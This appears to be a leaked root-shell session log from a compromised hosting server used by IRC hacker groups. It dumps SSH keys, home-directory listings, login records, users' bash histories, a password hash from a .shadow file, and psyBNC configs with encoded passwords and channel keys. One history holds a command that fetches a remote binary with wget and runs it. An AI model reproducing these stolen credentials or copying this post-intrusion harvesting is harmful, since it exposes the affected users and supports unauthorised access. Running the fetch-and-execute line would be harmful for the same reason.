jwSfkeq4n/8c5erPuGuQH/oJUkU6DD1KDkqKwptS4PkiAMZVV93tU/VBo3MT1i0YVQl TRWyg8sKuwsNv0f0x0day2qsoz0lSNYnjKXWYLqT1qryv1slI4BXuQB1jhr5dARBmVL +YCNx6OSxvt7Q9m0JwtTqQayOm6Zcab/H3pm97nrYKRRxX3ikdXJdnekCwJw5BPZcyp dqLlowB9hbVijWVnVZAYg96HssBRR6WxxNAPOLmCj/8bx4fLnNHu2F9tLdcNyzGMUuD bLxYI+06Nwtk3fovpKwo+b/DmfcHaF4Lkm96pWpuhc6oduxh6ySvlviw== halturnershow.com, ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA 7ry8evVeuNNH0+p9VXPMqqPgp9NjMx/EDUj7hnGwreKYWyCybTitmpGgTDFTuu8YZGA r+ssHoF2FMkr1lTF82IIsMx+EXMkoQJ0/SvMBO/gJiIsBRTU13n6Ad8FQZBCBez0dkz RI0msupnbWnytPvqu9j0/pErPzaGWrINB+6N63Cs241GU6Lt8EG6RX4UVgBTSm8aold +Ixpy+lmwTh3CNJu5zFtoCmmg7rCiQ7sn8ci4Rqq6YzV7LhzRyIiGRzH448v3/dDaUa f2ENIvycEz27ZezeB2g5B5icTPH+VQNhqTohEtoQec0vHqA9CzSExXufDlS4is+F7dJ LcA0Tnw== ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAuSVqCiY8KhmN3OHYH lu03zkoGIMIGQPaM0bM6alUQPl7H7iAF9WOqaQ7OjpsBxvQO7/tchkP9Azy40W428OK gg61XDrJoy/fBnOXAmvAKj42N7l3engj9P7MN229DDH0ygM/o1ykP7bob5MZx5BSzFu DYaQtK+OhuhbsNiXOGCtIXPQ6XLRSo72GKoFzT4Y1Kc/Pux0lXrA7JrX8cOw24TgkQ1 4Xh9vWRUXnxlq2HkrLT2VPrJ50Rl4feDSScqGyvXtQDuWrIsLdk5sA9EhIIqYbYsJUU oHcIh30tOyOUoPcg3KTbk7gcInMGl3k7IOTZHI17wqOiNu1qIWYcGr1Tw== apu.711chan.org, ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAnv nw1ZMHvmPzZ1cNLYwYYmUWVw5xncnMe/S/yyTwQ23kpDf6Ut0z/wpKeQd+m3XTiwzDU NsKLdIkUpZLucbqjBE1XlNF9pHqKqX1j5rvZN/rCNREdJkChWk2KRddSdBOg/Oc81tl OX6Fjv9zLglbo2y7Ojqx2eML/zifxTTTF82V0czG/bsXdtdhcW4JtVXVoN1iUcvEvZK AyEN41N/OZDAqUGaEYAjqDpmI/JJM3uCKDl1qelt0iuWZLEOivUp6emnjiQNPKF4Sb1 silje6uETSsjK/n8mIi1YmO/KNRg+MM9LQ2EWe/cS+xAJwyeDT9WiY/k867FjlXxIBP cu3Lw== []:5000 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAvmD6suMeQqo2o NRg9p4nzWttZZfLC1Uhmmnv/Y7YyQRjvBBjr5rAPdbfLxY6nsc4/f6JDmwNKdIn0j6L AcjFak/kuf7rAJwcolrsRxm4C5LH89D+r32t7guOI9hPgA0R38N7k7q2ykQlDNGyuMJ p+1UXSAe8t0E+2VSgrr173rqNe+1oRaPWHcUdwoN9O+VmTVg+uS+cvlLSVue8BrUCZS vcDAOdMXeSOos7kibaQ181juAjHp+xEHd0zfdQxzItP9mMz0lqnY+J/miHuu6sm4G3E 7WEXBLFjaTIZx3OzEg3eDBKpK8EYzXkYY5aq4eNNfCmqZqWdjnEBUwNCxrKGQ== []:9000 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAneqXXAJ+LhaK Kc6z2ugq1C6CojO0ylJCaZaO9WCL1CfstSGVBaEgYUq7qk7MtgGq71IIHuaYTE5KoXR 6l8P+pZaONa/2vSCbmdOg7q/9xBQwmuXC8zKEnR7IqPqYL5idFioGV1G2dWYMTFJySQ MPI96jW1a4iu5AL61zC2WEr9f8jDjGQ8+FTx8u7zX8GEaEJAQQEr99CpDq29jp7pKNF BOSo9OW5mDJt2Q8NOotExSdEkmkxrEBcOFshfiEmY99lm4QCjOFVDSxdH5s0VNKdYu0 FBfMRlEh+UXFtL29BuEQUZnMwqU2NqCJknQ1gQawn8pQfYkpf4vBsu/h4/p2ow== [root@demon2 ~]# cd /home [root@demon2 home]# ls -al total 252 drwx--x--x 50 root root 4096 Mar 27 16:19 . drwxr-xr-x 27 root root 4096 Mar 11 00:10 .. drwx------ 2 40zzz 40zzz 4096 Dec 21 21:57 40zzz drwx--x--x 17 admin admin 4096 Feb 11 22:44 admin drwx--x--x 6 alliancedn alliancedn 4096 Aug 1 2007 alliancedn drwx--x--x 8 aosw aosw 4096 Aug 1 2007 aosw -rw------- 1 root root 13312 Apr 21 05:01 aquota.group -rw------- 1 root root 13312 Apr 21 05:01 aquota.user drwxr-xr-x 3 root root 4096 Jan 14 00:10 asbestos drwx--x--x 9 barnseo barnseo 4096 Mar 5 23:19 barnseo drwx--x--x 6 bnc bnc 4096 Aug 8 2007 bnc drwx--x--x 6 bored bored 4096 Aug 1 2007 bored drwx--x--x 6 churc0 churc0 4096 Aug 1 2007 churc0 drwx--x--x 6 connors connors 4096 Aug 1 2007 connors drwx------ 3 cstest cstest 4096 Dec 11 17:29 cstest drwx------ 2 cunt cunt 4096 Mar 13 17:26 cunt drwx--x--x 5 dougie dougie 4096 Dec 20 16:28 dougie drwx--x--x 10 egg egg 4096 Mar 23 11:26 egg drwx--x--x 6 every every 4096 Aug 1 2007 every drwxr-xr-x 9 evilcode evilcode 4096 Mar 25 13:40 evilcode drwx--x--x 25 excodeirc excodeirc 4096 Apr 14 22:26 excodeirc drwx--x--x 6 exploiterc exploiterc 4096 Dec 15 13:10 exploiterc drwx--x--x 7 felosi felosi 4096 Feb 10 12:51 felosi drwx--x--x 6 felosii felosii 4096 Aug 1 2007 felosii drwxr-xr-x 2 root root 4096 Apr 22 2007 ftp drwx--x--x 9 g00ns83 g00ns83 4096 Apr 18 21:47 g00ns83 drwx--x--x 10 g00nsts395 g00nsts395 4096 Apr 16 19:57 g00nsts395 drwx--x--x 7 grumpy grumpy 4096 Aug 1 2007 grumpy drwx--x--x 4 hackrad hackrad 4096 Aug 2 2007 hackrad drwx--x--x 5 hanon hanon 4096 Mar 23 16:25 hanon drwx------ 2 silc silc 4096 Jan 4 23:12 help drwx--x--x 7 hthhost hthhost 4096 Dec 30 14:59 hthhost drwx------ 2 ident ident 4096 Feb 1 00:01 ident drwx--x--x 7 illmob illmob 4096 Apr 1 04:21 illmob drwx--x--x 5 lost lost 4096 Feb 19 19:07 lost drwx------ 2 root root 16384 Jul 31 2007 lost+found drwx--x--x 6 mycorp mycorp 4096 Aug 2 2007 mycorp drwx--x--x 8 party party 4096 Mar 7 18:20 party drwx--x--x 5 partyvan partyvan 4096 Jan 1 15:04 partyvan drwx--x--x 7 pingyill pingyill 4096 Aug 1 2007 pingyill drwx--x--x 5 564 565 4096 Mar 9 11:56 pr0be drwx--x--x 5 pvannet pvannet 4096 Mar 26 19:13 pvannet drwx--x--x 6 ragedns ragedns 4096 Aug 2 2007 ragedns drwx--x--x 6 rageserver rageserver 4096 Aug 1 2007 rageserver drwx--x--x 6 robo robo 4096 Aug 1 2007 robo drwx--x--x 15 shoutcas shoutcas 4096 Aug 6 2007 shoutcas drwx------ 3 silc silc 4096 Jan 18 16:08 silc drwx--x--x 7 sixtyz sixtyz 4096 Apr 16 19:09 sixtyz drwx--x--x 10 sn00g3s sn00g3s 4096 Apr 3 01:33 sn00g3s drwxrwxrwt 2 root root 4096 Apr 21 00:10 tmp drwx------ 5 tribal tribal 4096 Mar 26 07:36 tribal drwx--x--x 6 void void 4096 Aug 1 2007 void [root@demon2 home]# lastlog | grep -v Never Username Port From Latest root pts/1 74-34-107-191.ds Mon Apr 21 03:44:04 -0700 2008 barnseo pts/1 Wed Mar 5 23:05:21 -0800 2008 bnc pts/1 Sat Apr 19 20:27:10 -0700 2008 partyvan pts/5 cpe-76-174-156-5 Tue Jan 1 15:27:39 -0800 2008 [root@demon2 home]# cd 40zzz [root@demon2 40zzz]# ls -al total 24 drwx------ 2 40zzz 40zzz 4096 Dec 21 21:57 . drwx--x--x 50 root root 4096 Mar 27 16:19 .. -rw-r--r-- 1 40zzz 40zzz 24 Dec 21 21:57 .bash_logout -rw-r--r-- 1 40zzz 40zzz 176 Dec 21 21:57 .bash_profile -rw-r--r-- 1 40zzz 40zzz 124 Dec 21 21:57 .bashrc [root@demon2 40zzz]# cd ../admin [root@demon2 admin]# ls -al total 119196 drwx--x--x 17 admin admin 4096 Feb 11 22:44 . drwx--x--x 50 root root 4096 Mar 27 16:19 .. lrwxrwxrwx 1 root root 21 Sep 13 2007 admin_backups -> /backup/admin_backups drwxrwxr-x 2 admin admin 4096 Aug 1 2007 admin_backups1 drwx------ 2 admin admin 4096 Aug 1 2007 backups -rw------- 1 admin admin 5774 Feb 11 22:50 .bash_history -rw-r--r-- 1 admin admin 304 Apr 27 2006 .bash_logout -rw-r--r-- 1 admin admin 191 Apr 27 2006 .bash_profile -rw-r--r-- 1 admin admin 124 Apr 27 2006 .bashrc -rw-rw-r-- 1 admin admin 6090 Jul 2 2007 da.cpanel.import.9beta1.tar.gz -r--r--r-- 1 admin admin 20320 May 26 2007 da.cpanel.import.pl -rwxr-xr-x 1 admin admin 272 Aug 6 2007 defaults.conf drwxr-xr-x 9 admin admin 4096 Jul 4 2007 domains drwx------ 2 admin admin 4096 Sep 29 2007 .elinks -rw-r--r-- 1 admin admin 383 Apr 27 2006 .emacs drwxr-xr-x 4 admin admin 4096 Aug 1 2007 ex drwxrwxr-x 2 admin admin 4096 Oct 11 2007 export drwxrwx--- 5 admin admin 4096 Aug 1 2007 imap drwxrwxr-x 2 admin admin 4096 Oct 11 2007 import drwx------ 2 admin admin 4096 Aug 1 2007 mail drwxrwxr-x 2 admin admin 4096 Jan 4 2007 .mc drwxr-xr-x 6 admin admin 4096 May 15 2006 modsecurity-apache_1.9.4 -rw-rw-r-- 1 admin admin 496805 Jan 11 2007 modsecurity-apache_1.9.4.tar.gz -rw------- 1 admin admin 419 Sep 29 2007 .nessusrc drwxr-xr-x 2 admin admin 4096 Jul 3 2007 public_html -rw-r--r-- 1 admin admin 55412 Jul 3 2007 rulezz.conf -rw-r----- 1 admin mail 34 Jun 29 2007 .shadow drwx------ 2 admin admin 4096 Aug 1 2007 .ssh -rwx------ 1 admin admin 8515 Feb 10 15:41 t -rw-r--r-- 1 admin admin 213250 Aug 1 2007 user.admin.alliancedn.tar.gz -rw-r----- 1 admin admin 120993882 Aug 1 2007 user.admin.sn00g3s.tar.gz drwx--x--x 2 admin admin 4096 Dec 8 10:00 user_backups drwxr-xr-x 3 admin admin 4096 Sep 29 2007 webmail [root@demon2 admin]# cat .bash_history cd cd user_backups ftp premshells.com ping rst-crew.net exit cdf cd cd user_backups ftp premshells.com uptime nst exit cd cd userbackups cd user_backups ftp blackhat-hosting.com exit ftp black-hosting.com ftp blackhat-hosting.com updatedb exit nano -w /etc/apf/deny_hosts.rules exit cd user_backups cd cd user-backups cd user_backups ls cp rosec.tar.gz /home/admin/domains cd /home/admin/domains ls mv rosec.tar.gz cpl.alliancedns.com cd cpl.alliancedns.com mv rosec.tar.gz public_html exit cd mc chmod 644 rosec.tar.gz exit cd ls rm -rf backup user_backups mkdir /home/admin/admin_backups ping zone-h.org exit cd ls ls mkdir user_backups cp *.tar.gz user_backups exit cd chmod 755 domains ls -la domains exit cd chmod 755 domains cd exit cd ls mv *.tar.gz user_backups ls ls user_backups exit crontab -e exit cd ls ls admin_backups rm -rf admin_backups cat /etc/hosts ls mkdir admin_backups exit cd cd admin* ls ls ls exit cd ls cd admin* ls rm -rf */tar.gz ls rm -rf *tar.gz ls exit cd cd admin* ls cat /etc/hosts exit cd ls mv user.admin.aosw.tar.gz admin_backups ls admin* ls -la admin* top exit cd ls rm -rf backup-8.1.2007_11-19-41_g00ns83.tar.gz wget http://kade.nu/da/da.cpanel.import.9beta1.tar.gz' wget http://kade.nu/da/da.cpanel.import.9beta1.tar.gz tar zxvf da.cpanel.import.9beta1.tar.gz nano -w defaults.conf exit nano -w defaults.conf chmod 755 defaults* nano -w defaults.conf mkdir import export rm -rf import mv cp import ls perl da.cpanel.import.pl mkdir user_backups perl da.cpanel.import.pl ls user* ls -la export cd ls cd export ls rm -rf niggerma.tar.gz sevenz.tar.gz mv *.tar.gz ../user_backups ls cd .. ls -la user_backups exit cd ls ls -la rm -rf backup-8.2.2007_18-32-22_g00ns83.tar.gz ls import cd import ls -la rm -rf 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exit cd ftp ls mv your* user_backups exit cd cd domains ls cd premshells.com ls cd public_html ls exit cd cd domains cd prem* wget protectedhost.com/stat.tar.gz tar zxvf stat* LS ls tar zxvf stat.tar.gz mv status public_html cd cd domains ls cd premshells.com cd public_html; wget http://enterprise.bidmc.harvard.edu/pub/nessus-php/nessus-php-0.7.tar.gz tar zxvf nessus-php-0.7.tar.gz mv nessus-php-0.7/ nes links http://cgi.tenablesecurity.com/nessus3dl.php?file=Nessus-3.0.6-es5.i386 .rpm&licence_accept=yes&t=aefdb0eaf2b035d672a91d4b551187b4 wget http://cgi.tenablesecurity.com/nessus3dl.php?file=Nessus-3.0.6-es5.i386. rpm&licence_accept=yes&t=aefdb0eaf2b035d672a91d4b551187b4 rm -rf index.html.1 killall links wget shitonkikes.com/Nessus-3.0.6-es5.i386.rpm rpm -i Nessus-3.0.6-es5.i386.rpm exit exit ./configure cd /opt ls cd ness* ls ls sbin sbin/nessus-adduser exit cd cd import ftp cp2.secureservertech.com cd .. ls nano -w defaults.conf ls import rm -rf import/backup-8.6.2007_22-02-36_shoutcas.tar.gz perl da.cpanel.import.pl ls export cp export/stockegg* user_backups ls user-Backups ls user_backups ping www.stockegg.com ping www.stockegg.com ping www.stockegg.com ping www.stockegg.com ping www.stockegg.com ping www.stockegg.com ping www.stockegg.com ping www.stockegg.com ping www.stockegg.com ping www.stockegg.com service named restart exit cd cd user_* ls ftp sst0.com cd cd user_* ls -la aryan88* ftp sst0.com exit cd cd user_* ftp sst0.com cd ls exit cd ls wget fearlesshost.com/t chmod 700 t ./t exit [root@demon2 admin]# ls -al .ssh total 12 drwx------ 2 admin admin 4096 Aug 1 2007 . drwx--x--x 17 admin admin 4096 Feb 11 22:44 .. -rw-r--r-- 1 admin admin 220 Aug 1 2007 known_hosts [root@demon2 admin]# cat .ssh/* ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA6qCFv8UowWc3dcRnWqzz4tPsx4Glt EUA4rRmt/tsP0T4bsddMuF0yYvaSHVAZNjZwfup0heDh/cCs08AiGlKDL3yvNO4nTa/sXKr1AJ0W dg0GMnhT+D0Mu8PXdCKhIfPZLsaW5p45WYmwy6afKxM20wZNVKw3YTXJweFE6n0s9M= [root@demon2 admin]# ls -al /backup/admin_backups total 28936116 drwxr-xr-x 2 admin admin 4096 Dec 30 16:49 . drwxr-xr-x 6 admin admin 4096 Feb 1 03:03 .. -rw-r----- 1 admin felosi 11560 Sep 14 2007 admin.admin.felosi.tar.gz -rw-r----- 1 admin admin 11404750600 Dec 18 21:28 admin.root.admin.tar.gz -rw-r----- 1 admin admin 35395367 Aug 11 2007 reseller.admin.aaatrans.tar.gz -rw-r----- 1 admin 535 2166835881 Sep 14 2007 reseller.admin.bwhost.tar.gz -rw-r----- 1 admin 503 27875 Sep 14 2007 reseller.admin.llythexic.tar.gz -rw-r----- 1 admin 549 8597301 Sep 14 2007 reseller.felosi.brinkhos.tar.gz -rw-r----- 1 admin 552 5638521 Sep 14 2007 reseller.felosi.burn.tar.gz -rw-r----- 1 admin alliancedn 264984 Dec 30 16:29 user.admin.alliancedn.tar.gz -rw-r----- 1 admin aosw 541773752 Sep 14 2007 user.admin.aosw.tar.gz -rw-r----- 1 admin 532 28274761 Sep 14 2007 user.admin.aryan88.tar.gz -rw-r----- 1 admin 538 518730829 Dec 30 16:29 user.admin.asbestos.tar.gz -rw-r----- 1 admin barnseo 16041617 Dec 18 21:29 user.admin.barnseo.tar.gz -rw-r----- 1 admin bnc 2082640 Dec 30 16:29 user.admin.bnc.tar.gz -rw-r----- 1 admin bored 3830711 Dec 18 21:29 user.admin.bored.tar.gz -rw-r----- 1 admin churc0 4341166 Dec 18 21:29 user.admin.churc0.tar.gz -rw-r----- 1 admin connors 652449 Dec 18 21:29 user.admin.connors.tar.gz -rw-r----- 1 admin dougie 5454961654 Dec 30 16:37 user.admin.dougie.tar.gz -rw-r----- 1 admin 558 20340587 Dec 18 21:37 user.admin.earn.tar.gz -rw-r----- 1 admin egg 5530647 Dec 30 16:37 user.admin.egg.tar.gz -rw-r----- 1 admin every 323268270 Dec 30 16:37 user.admin.every.tar.gz -rw-r----- 1 admin evilcode 1607382248 Dec 30 16:40 user.admin.evilcode.tar.gz -rw-r----- 1 admin excodeirc 113123361 Dec 30 16:41 user.admin.excodeirc.tar.gz -rw-r----- 1 admin exploiterc 273460363 Dec 18 21:43 user.admin.exploiterc.tar.gz -rw-r----- 1 admin felosii 202367 Dec 18 21:43 user.admin.felosii.tar.gz -rw-r----- 1 admin g00ns83 1922138751 Dec 30 16:44 user.admin.g00ns83.tar.gz -rw-r----- 1 admin g00nsts395 5616214 Dec 30 16:44 user.admin.g00nsts395.tar.gz -rw-r----- 1 admin grumpy 207859624 Dec 30 16:44 user.admin.grumpy.tar.gz -rw-r----- 1 admin 516 988823 Sep 14 2007 user.admin.hackersd.tar.gz -rw-r----- 1 admin hackrad 371198425 Dec 30 16:45 user.admin.hackrad.tar.gz -rw-r----- 1 admin 517 2334763 Dec 18 21:48 user.admin.high.tar.gz -rw-r----- 1 admin illmob 593721185 Dec 30 16:46 user.admin.illmob.tar.gz -rw-r----- 1 admin 519 104101941 Dec 18 21:49 user.admin.leetmach.tar.gz -rw-r----- 1 admin mycorp 147245 Dec 30 16:46 user.admin.mycorp.tar.gz -rw-r----- 1 admin partyvan 327144959 Dec 30 16:46 user.admin.partyvan.tar.gz -rw-r----- 1 admin pingyill 30825336 Dec 30 16:47 user.admin.pingyill.tar.gz -rw-r----- 1 admin ragedns 189555066 Dec 30 16:47 user.admin.ragedns.tar.gz -rw-r----- 1 admin rageserver 255007 Dec 30 16:47 user.admin.rageserver.tar.gz -rw-r----- 1 admin robo 290786 Dec 30 16:47 user.admin.robo.tar.gz -rw-r----- 1 admin shoutcas 385370416 Dec 30 16:48 user.admin.shoutcas.tar.gz -rw-r----- 1 admin sn00g3s 269230557 Dec 30 16:49 user.admin.sn00g3s.tar.gz -rw-r----- 1 admin 524 1468386072 Sep 14 2007 user.admin.vg114.tar.gz -rw-r----- 1 admin void 14594 Dec 30 16:49 user.admin.void.tar.gz -rw-r----- 1 admin 548 75815612 Sep 14 2007 user.admin.yourgift.tar.gz -rw-r----- 1 admin 551 626926 Sep 14 2007 user.brinkhos.bayw.tar.gz -rw-r----- 1 admin 555 30546 Sep 14 2007 user.burn.kid652.tar.gz -rw-r----- 1 admin 553 27271 Sep 14 2007 user.burn.lucasl123.tar.gz -rw-r----- 1 admin 554 24648 Sep 14 2007 user.burn.rsuchow.tar.gz -rw-r----- 1 admin 533 308158933 Sep 14 2007 user.bwhost.assault.tar.gz -rw-r----- 1 admin 526 4716486 Sep 14 2007 user.bwhost.ballardt.tar.gz -rw-r----- 1 admin 527 175245944 Sep 14 2007 user.bwhost.darkstorm.tar.gz -rw-r----- 1 admin 528 597461 Sep 14 2007 user.bwhost.mffclan.tar.gz -rw-r----- 1 admin 529 540182805 Sep 14 2007 user.bwhost.squad.tar.gz -rw-r----- 1 admin 530 903208 Sep 14 2007 user.bwhost.tnpreacher.tar.gz -rw-r----- 1 admin 531 71751894 Sep 14 2007 user.bwhost.xlostboyx.tar.gz -rw-r----- 1 admin 550 8486403 Sep 14 2007 user.felosi.prox.tar.gz [root@demon2 admin]# ls -al backups total 8 drwx------ 2 admin admin 4096 Aug 1 2007 . drwx--x--x 17 admin admin 4096 Feb 11 22:44 .. [root@demon2 admin]# cat .shadow $1$k67PPtsg$vReIxhUQshkQHrgN8qop4/ [root@demon2 admin]# cd ../bnc [root@demon2 bnc]# ls -al total 364 drwx--x--x 6 bnc bnc 4096 Aug 8 2007 . drwx--x--x 50 root root 4096 Mar 27 16:19 .. -rw------- 1 bnc bnc 6018 Apr 19 20:31 .bash_history -rw-r--r-- 1 bnc bnc 24 Aug 3 2007 .bash_logout -rw-r--r-- 1 bnc bnc 176 Aug 3 2007 .bash_profile -rw-r--r-- 1 bnc bnc 124 Aug 3 2007 .bashrc drwx--x--x 3 bnc bnc 4096 Aug 3 2007 domains drwxrwx--- 3 bnc mail 4096 Aug 3 2007 imap drwx------ 2 bnc bnc 4096 Aug 3 2007 mail drwxr-xr-x 12 bnc bnc 4096 Apr 20 23:41 psybnc -rw-rw-r-- 1 bnc bnc 311715 Jun 4 2005 psyBNC-2.3.2-7.tar.gz lrwxrwxrwx 1 bnc bnc 35 Aug 3 2007 public_html -> ./domains/bnc.g00ns.net/public_html -rw-r----- 1 bnc mail 34 Aug 3 2007 .shadow [root@demon2 bnc]# cat .bash_history cat ls ls public_html cd public_html/ ls nano index.html cd $home ls mkdir bnc1 cd bnc1 wget http://www.psybnc.at/download/beta/psyBNC-2.3.2-7.tar.gz tar -zxvf psyBNC-2.3.2-7.tar.gz cd psybnc make menuconfig ./psybnc ./Psybnc ls make ./psybnc ./psybnc stop ps -aux kill 26364 ls ps -aux kill 26364 ls ps -aux kill 26364 ps -aux ls nano psybnc.conf ./psybnc ps -aux w who users kill 26364 kill 26364 kill -i 26364 kill -9 26364 ps -au ps -aux cd $home ls rm -rf bnc1 users wget http://www.psybnc.net/psyBNC-2.3.2-7.tar.gz tar zxvf psyBNC-2.3.2-7.tar.gz ls cd psybnc ls -al make menuconfig make menuconfig make ./psybnc ps =aux ps ps -a ps -A kill -9 3365 kill 3365 cd psybnc/ ls pico psybnc.conf text psybnc.conf psybnc.conf nano psybnc.conf nano psybnc.conf ./[sybnc ./psybnc w ls cd psybnc ls nano psybnc.conf nano psybnc.conf makesalt ./makesalt cd tools ls cd .. ls cd scripts ls cd example/ ls cd .. cd .. ls cd help ls cat ADDUSER.TXT cd .. ls nano psybnc.conf ls cd log ls cat psybnc.log cat psybnc.log cat psybnc.log cat psybnc.log cat psybnc.log cd .. ls nano psybnc.conf nano psybnc.conf cd log cat log cat psybnc.log cat psybnc.log cat psybnc.log cd .. ls cd .. ls ps -aux kill 4414 ps -aux kill 4414 ps -aux ls rm -rf psybnc ps -aux kill 4414 ps -aux tar -zxvf psyBNC-2.3.2-7.tar.gz ls cd psybnc ls make menuconfig ls make ls ./psybnc nano psybnc.conf ps -aux ps -aux ls rm -rf psybnc.pid kill 1463 ps -aux ls kill 1463 ls ps -aux ./psybnc restart ./psybnc psybnc.conf ps -aux kill 1463 ps -aux ls killall 1463 kill 1463 killall psybnc ps -aux kill -9 1463 ps -aux ./psybnc ps -aux kill -9 2455 ps -aux nano psybnc.conf nano psybnc.conf ./psybnc cd log nano log ls cat psybnc.log cd .. ls nano psybnc.conf cd .. ls rm -rf psybnc tar zxvf psyBNC-2.3.2-7.tar.gz ps -aux kill -9 2558 cd psybnc ls make ps -aux nano psybnc.conf nano psybnc.conf ./psybnc cd psybnc nano psybnc.conf cp psybnc.conf psybnc.1.conf ls cd psybnc ls cp psybnc.conf psybnc.1.conf nano psybnc.1.conf nano psybnc.1.conf nano psybnc.1.conf echo "" > psybnc.1.conf nano psybnc.1.conf ./psybnc psybnc.1.conf cd psybnc ls nano psybncchk crontab -e crontab -e crontab -e pwd crontab -e nano psybncchk nano psybncchk nano psybncchk ps -aux ps -aux cd psybnc cd log ls cat psybnc.log cat psybnc.log ls cat USER1.TRL cat USER2.TRL cat USER3.LOG cd .. ls cat psybnc.conf cd log cat psybnc.log ls cd .. ls nano psybnc.conf nano psybnc.conf nano psybnc.1.conf nano psybnc.conf cd tools ls cd .. ls cd key ls cd .. ls nano psybnc.1.conf cd log ls cat psybnc.log cd .. ls ps -aux kill -9 3514 ps -aux ./psybnc psybnc.conf ls cd psybnc ls nano psybnc.1.conf nano psybnc.1.conf grep -rn 'version' * ps -aux nano psybnc.1.conf nano psybnc.conf nano psybnc.1.conf nano psybnc.1.conf nano psybnc.1.conf nano psybnc.1.conf exit crontab crontab -h crontab -l ls cd psybnc ls cp psybnc.1.conf psybnc.gso.conf nano psybnc.gso.conf nano psybnc.conf nano psybnc.conf nano psybnc.gso.conf ./psybnc psybnc.gso.conf ls cd psybnc ls cat psybnc.conf cd psybnc/ ls nano psybnc.gso.conf nano psybnc.conf ls w who users ls psybnc ls domains ls public_html/ ps -aux uptime uname -a ls cd psybnc/ ls mkdir probebnc ls cd probebnc ls ls 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make menuconfig make ls ./psybnc cd ps ax kill -9 9128 12320 24226 28825 cd psybnc ps ax ./psybnc psybnc.1.conf ./psybnc ./psybnc psybnc.gso.conf cd ls exit ls cd psybnc ls head psybnc.1.conf head psybnc.gso.conf ./psybnc psybnc.gso.conf ps -aiux ps -aux ps -aux kill 21054 kill -9 21054 ./psybnc psybnc.gso.conf ls cd psy cd psybnc/ ls cd probe/ ls cd psybnc/ ls ./psybnc ps -aux ls nano psybnc.conf nano psybnc.conf nano psybnc.conf.old nano config.h nano psybnc.conf nano log/psybnc.log cd $user ls cd psybnc/ ls cd probe ls rm -rf psybnc/ tar xzf psyBNC-2.3.2-7.tar.gz ls cd psy cd psybnc ls ./psybncchk nano config.h ls nano REa nano README make menuconfig make ls ./psybnc ps ax kill 1536 ls ps ax kill 9672 ps ax kill 9672 ps axc ps ax ls ./psybnc psybnc.gso.conf ps ax kill 1536 ps ax kill -s 1536 kill -9 9672 ps ax kill -9 1536 ps ax ls ./psybnc psybnc.gso.conf ps ax ps ax kill -9 21041 ps ax kill -9 21047 ps ax kill -9 24942 ps ax ls ./psybnc psybnc.1.conf ps ax ls ./psybnc psybnc.gso.conf ps ax kill -9 ./psybnc psybnc.1.conf kill -9 25484 kill -9 25512 ps ax ls ./psybnc cd help ls cd .. ls ps ax ./psybnc psybnc.1.conf ./psybnc ./psybnc psybnc.gso.conf ps ax ls cd psybnc ls head psybnc.conf head psybnc.1.conf ls cat psybnc.gso.conf head psybnc.gso.conf psybnc psybnc.gso.conf ls ./psybnc psybnc.gso.conf ls cd psybnc ls head psybnc.gso.con head psybnc.gso.conf psybnc psybnc.gso.conf ./psybnc psybnc.gso.conf ls cd psybnc ls head psybnc.gso.conf psybnc psybnc.gso.conf ./psybnc psybnc.gso.conf ps -aux kill -9 17551 ps -aux ./psybnc psybnc.gso.conf ps -aux ps -aux who last ps -aux head psybnc.gso.conf cd psybnc head psybnc.gso.conf ls head psybnc.conf netstat | grep listen netstat kill -9 31328 ./psybnc psybnc.gso.conf ls cd psybnc ls cat psybnc.gso.conf ls cd psybnc/ ls cat psybnc.gso.conf [root@demon2 bnc]# cd psybnc [root@demon2 psybnc]# ls CHANGES log psybnc psybnc.gso.conf.old targets.mak config.h Makefile psybnc.1.conf psybnc.pid TODO COPYING makefile.out psybnc.1.conf.old README tools FAQ makesalt psybncchk salt.h help menuconf psybnc.conf SCRIPTING key motd psybnc.conf.old scripts lang probe psybnc.gso.conf src [root@demon2 psybnc]# cat psybnc.1.conf PSYBNC.SYSTEM.PORT1=11474 PSYBNC.SYSTEM.HOST1= PSYBNC.HOSTALLOWS.ENTRY0=*;* USER1.USER.LOGIN=admin USER1.USER.USER=FiSh USER1.USER.PASS==1h1K'Z`U`B'810'='T USER1.USER.RIGHTS=1 USER1.USER.VLINK=0 USER1.USER.PPORT=0 USER1.USER.PARENT=0 USER1.USER.QUITTED=0 USER1.USER.DCCENABLED=1 USER1.USER.AUTOGETDCC=0 USER1.USER.AIDLE=0 USER1.USER.LEAVEQUIT=0 USER1.USER.AUTOREJOIN=1 USER1.USER.SYSMSG=1 USER1.USER.LASTLOG=0 USER1.USER.CERT=+ USER1.USER.VHOST=g00ns.net USER1.USER.LEAVEMSG=afk USER1.USER.AWAYNICK=FiSh|bnc USER1.USER.NICK=FiSh USER1.SERVERS.SERVER1=S=irc.g00ns.net USER1.SERVERS.PORT1=6601 USER1.CHANNELS.ENTRY3=#13337 USER1.CHANNELS.ENTRY6=#help USER1.CHANNELS.ENTRY8=#notgay USER1.CHANNELS.ENTRY1=#g00nspriv8 USER1.CHANNELS.ENTRY4=#batcave USER1.CHANNELS.KEY4=+1I271$28262u2A2U2U USER1.CHANNELS.ENTRY7=#exploitercode USER1.CHANNELS.ENTRY12=#s3x USER1.CHANNELS.KEY12=+1W202824 USER1.CHANNELS.ENTRY5=#g00ns USER1.CHANNELS.ENTRY0=#illmob USER1.CHANNELS.ENTRY2=#private USER1.CHANNELS.KEY2=+1N2h262e2b2o2F2&2U3a2d2D2A USER1.CHANNELS.ENTRY9=#exopers USER1.CHANNELS.ENTRY10=#irclogs USER1.CHANNELS.KEY1=+1G2i2c2j2j2p2@ USER2.USER.LOGIN=sCuZz USER2.USER.USER=sCuZz USER2.USER.PASS=='R1n1b`W1B031K`=`O USER2.USER.RIGHTS=0 USER2.USER.VLINK=0 USER2.USER.PPORT=0 USER2.USER.PARENT=0 USER2.USER.QUITTED=0 USER2.USER.DCCENABLED=1 USER2.USER.AUTOGETDCC=0 USER2.USER.AIDLE=0 USER2.USER.LEAVEQUIT=0 USER2.USER.AUTOREJOIN=1 USER2.USER.SYSMSG=1 USER2.USER.LASTLOG=0 USER2.USER.CERT=+ USER2.USER.VHOST=g00ns.net USER2.USER.NICK=sCuZz USER2.SERVERS.SERVER1=irc.g00ns.net USER2.SERVERS.PORT1=6667 USER2.CHANNELS.ENTRY2=#private 